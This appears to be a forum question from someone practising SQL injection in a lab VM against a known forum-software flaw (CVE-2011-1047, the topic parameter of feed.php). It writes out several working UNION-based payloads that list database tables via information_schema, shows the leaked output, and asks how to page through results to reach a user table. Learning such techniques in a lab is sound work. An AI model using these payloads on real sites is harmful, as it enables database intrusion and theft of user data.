This might seem like a noob question. I am currently trying SQL injection on a VM. This is what I am trying
union select group_concat(table_name) from information_schema.tables#
And the injection works. But the page that is returned is an XML file and each tag has a size limitation, so I can see only half of the results.
<title>Bla Forum - Topic: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>
Is there a way to print the second half of the results. The table that I need to see contains the word "user". If I'm too ambiguous I want to do something along the lines of:
- Arrange the rows of the result and then
group_concatit - Slice the result (as in
string[10:]) - Select all the rows after
tables_priv
What I already tried:
union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#
Nothing is printed out. But this query works when I directly try it in the VM's MySQL (after omitting the 'union' and the '#').
union select group_concat(table_name) from information_schema.tables where table_name like 'user'#
Didn't work on neither the web application nor directly in VM's MySQL.
PS. I know sqlmap will do the job for me, but I want to try things manually.
PPS. I am trying CVE-2011-1047 (topic parameter in feed.php)
